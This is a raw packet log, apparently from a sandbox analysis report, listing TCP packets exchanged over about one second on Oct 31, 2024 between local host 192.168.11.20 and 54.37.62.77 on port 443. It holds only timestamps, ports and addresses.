                                                                                                                                                                                                  Oct 31, 2024 18:05:23.809709072 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.809804916 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.810461044 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.810487986 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.810636044 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.810636044 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.810645103 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.810652018 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.810755968 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.811729908 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.811744928 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.811897993 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.811897993 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.811908007 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.812016010 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.812016010 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.907521009 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.907610893 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.907753944 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.907845974 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.907876015 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.908071041 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.909651995 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.909737110 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.909867048 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.909867048 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.909929037 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.909961939 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.969310999 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.969837904 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.969881058 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.970041037 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.970041037 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.970041037 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.970105886 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.970139980 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.970309973 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.970747948 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.970792055 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.970935106 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.970935106 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.971041918 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.971086979 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.971267939 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.971728086 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.971769094 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.972004890 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.972004890 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.972004890 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.972065926 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.972206116 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.973027945 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.973072052 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.973212004 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.973212004 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.973289967 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.973289967 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.973289967 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.973324060 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.973510027 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.973795891 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.973839998 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.973969936 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.974036932 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.974036932 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.974072933 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.974208117 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.974613905 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.974658966 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.974814892 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.974814892 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.974814892 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.974879026 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.974896908 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.974896908 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.975126982 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.975719929 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.975761890 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.975907087 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.975982904 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.975982904 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.975982904 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.976042032 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.976066113 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.976206064 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.976572990 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.976624012 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.976814985 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.976815939 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.976815939 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.976876974 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.976912975 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.977088928 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.977766037 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.977808952 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.977957964 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.977957964 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.978019953 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.978046894 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.978075027 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.978255987 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.979557037 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.979602098 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.979773998 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.979774952 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.979835033 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.979856014 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.979856014 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.979996920 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.980890036 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.980946064 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.981129885 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.981129885 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.981129885 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.981129885 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.981209040 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.981230021 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.981385946 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.981733084 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.981789112 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.981961966 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.981961966 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.982021093 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.982038975 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.982038975 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.982166052 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.982752085 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.982798100 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.982969046 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.982969999 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.983030081 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.983030081 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.983058929 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.983087063 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.983290911 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.004369020 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.004369974 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.004401922 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.004589081 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.005074024 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.005119085 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.005275011 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.005275011 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.005322933 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.005322933 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.005322933 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.005352974 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.005528927 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.006068945 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.006113052 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.006249905 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.006249905 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.006310940 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.006311893 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.006340027 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.006370068 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.006503105 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.007041931 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.007085085 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.007236958 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.007236958 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.007236958 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.007301092 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.007333994 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.007333994 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.007519960 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.010763884 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.010823965 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.010967016 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.010967970 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.011040926 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.011080980 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.011282921 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.084697008 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.084755898 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.084923029 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.084923983 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.084980965 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.085000038 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.085000038 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.085210085 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.087441921 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.087496996 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.087660074 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.087660074 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.087723017 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.087723017 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.087723970 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.087757111 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.088000059 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.089755058 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.089816093 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.089982033 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.089982986 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.089982986 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.089982986 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.090048075 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.090240955 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.120577097 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.120635033 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.120815039 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.120815039 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.120873928 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.120907068 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.120907068 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.121117115 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.129287958 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.129358053 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.129489899 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.129491091 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.129549026 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.129549026 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.129549980 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.129586935 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.129801989 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.130106926 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.130165100 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.130285025 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.130373001 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.130413055 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.130597115 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.130873919 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.130924940 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.131062984 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.131062984 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.131109953 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.131130934 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.131174088 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.131375074 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.131819963 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.131866932 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.132039070 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.132039070 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.132092953 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.132118940 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.132118940 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.132285118 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.132803917 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.132869005 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.133040905 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.133086920 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.133109093 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.150532961 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.150676012 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.328989983 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.329003096 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.329173088 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.329191923 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.329191923 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.329237938 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.329256058 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.329293013 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.329293013 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.329389095 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.329390049 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.329438925 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.329484940 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.329511881 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.329535961 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.329685926 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.329732895 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.329785109 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.329849958 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.329849958 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.329900026 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.329940081 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.329977989 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.329978943 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.330013990 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.330044985 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.330048084 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.330048084 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.330089092 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.330199003 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.330199003 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.330250025 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.330293894 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.330296993 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.330375910 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.330394983 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.330435038 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.330454111 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:24.330507994 CET49755443192.168.11.2054.37.62.77
